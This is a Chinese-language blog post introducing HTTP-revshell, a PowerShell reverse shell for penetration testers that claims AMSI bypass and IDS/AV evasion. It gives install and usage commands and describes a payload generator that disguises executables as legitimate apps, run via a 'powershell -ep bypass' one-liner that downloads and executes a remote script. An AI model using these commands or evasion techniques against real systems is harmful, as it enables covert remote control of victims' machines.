HTTP-revshell是什么意思

這篇文章將為大家詳細講解有關(guān)HTTP-revshell是什么意思，小編覺得挺實用的，因此分享給大家做個參考，希望大家閱讀完這篇文章后可以有所收獲。

HTTP-revshell

HTTP-revshell是一個能夠繞過AMSI的PowerShell代理感知型反向Shell，這款工具轉(zhuǎn)為紅隊研究人員以及滲透測試人員設(shè)計，能夠通過HTTP/S協(xié)議來給研究人員提供一個反向Shell鏈接。HTTP-revshell使用了一種隱蔽的數(shù)據(jù)信道，可以通過Web請求來獲取目標(biāo)設(shè)備的控制權(quán)，從而繞過類似IDS、IPS和AV之類的安全解決方案。

功能介紹

• SSL

• 代理感知

• 上傳功能

• 下載功能

• 錯誤控制

• AMSI繞過

• 服務(wù)器端多會話支持

• PowerShell函數(shù)自動補全

工具安裝

廣大研究人員可以使用下列命令將該項目源碼克隆至本地，并完成依賴組件的自動化安裝：

git clone https://github.com/3v4Si0N/HTTP-revshell.git

cd HTTP-revshell/

pip3 install -r requirements.txt

數(shù)據(jù)提取功能使用

上傳：

upload /src/path/file C:\dest\path\file

下載：

download C:\src\path\file /dst/path/file

查看server.py幫助-服務(wù)器端使用

usage: server.py [-h] [--ssl] [--autocomplete] host port

 

Process some integers.

 

positional arguments:

  host            Listen Host

  port            Listen Port

 

optional arguments:

  -h, --help      show this help message and exit

  --ssl           Send traffic over ssl

  --autocomplete  Autocomplete powershell functions

查看WebRev.ps1幫助-客戶端使用

Import-Module .\Invoke-WebRev.ps1

Invoke-WebRev -ip IP -port PORT [-ssl]

工具使用-server-multisession.py（服務(wù)器端多會話支持）

服務(wù)器端支持同時與客戶端建立多個鏈接，下面給出的菜單中包含三哥基礎(chǔ)命令，即sessions、interact和exit：

- sessions --> 顯示當(dāng)前活動會話

     - interact --> 與一個會話進行交互，比如說：interact <session_id>

     - exit --> 關(guān)閉應(yīng)用程序

如需修改會話，可以按下CTRL+D來退出當(dāng)前會話，此時不會關(guān)閉原有會話。

Revshell-Generator.ps1-Payload自動生成器

這個腳本可以幫助我們創(chuàng)建一個帶有Payload的可執(zhí)行文件，這個文件是我們使用HTTP-revshell所必須的。工具提供了六個預(yù)定義的模板和一個支持自定義的模板。工具生成的Payload會偽裝成合法應(yīng)用程序的圖標(biāo)、產(chǎn)品信息和版權(quán)信息等等。除此之外，它們都會在與服務(wù)器建立連接之前打開原始的應(yīng)用程序，并偽裝成合法應(yīng)用程序來執(zhí)行。

Payload生成器使用：

powershell -ep bypass "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

工具使用樣例

關(guān)于“HTTP-revshell是什么意思”這篇文章就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，使各位可以學(xué)到更多知識，如果覺得文章不錯，請把它分享出去讓更多的人看到。